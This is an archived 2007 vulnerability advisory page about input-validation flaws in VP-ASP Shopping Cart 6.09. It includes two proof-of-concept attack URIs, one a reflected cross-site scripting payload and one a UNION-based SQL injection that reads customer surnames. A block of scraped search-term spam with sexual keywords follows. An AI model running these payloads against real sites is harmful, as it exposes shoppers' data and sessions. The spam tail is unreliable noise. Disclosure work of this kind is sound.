about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities


Title VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities
Published 2007-01-11-12:00AM
Updated 2007-01-12-05:50PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  ajann is credited with the discovery of these vulnerabilities.
Vulnerable  VPASP Shopping Cart 6.09
Not Vulnerable  
Code   To exploit a cross-site scritping issue:

An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI.

The following proof-of-concept URI is available:

http://example.com/[path]/shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E

To exploit an SQL-injection issue:

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://example.com/[path]/shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 08 Dec 2009 07:40:23 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.zhiyon Nice job, GET /galle word 2000 actress se Powered by www.tamil components halle berr unreal irc ww+89+com Indian nak admin/cont exim smtpd SEXYIMAGE sexveido www.wxhous Www.you to freevideos yanfeng51. version fo pron sex proxad MS06-073 SEXY MOVIE www.sxs.ar 1990.aishu artis bugi .php www.tdqczj www.cimte. SAmba tits fuck www. sexg Exploits S www.qq8010 www.jujiam Sexy Girls www.mu90.c WWW.TRISHA mrbs local root akse kos puki.com moodle+1.6 php-nuke 2 SAXY PICTH www.scyang tv.sexe.ht Wallpapers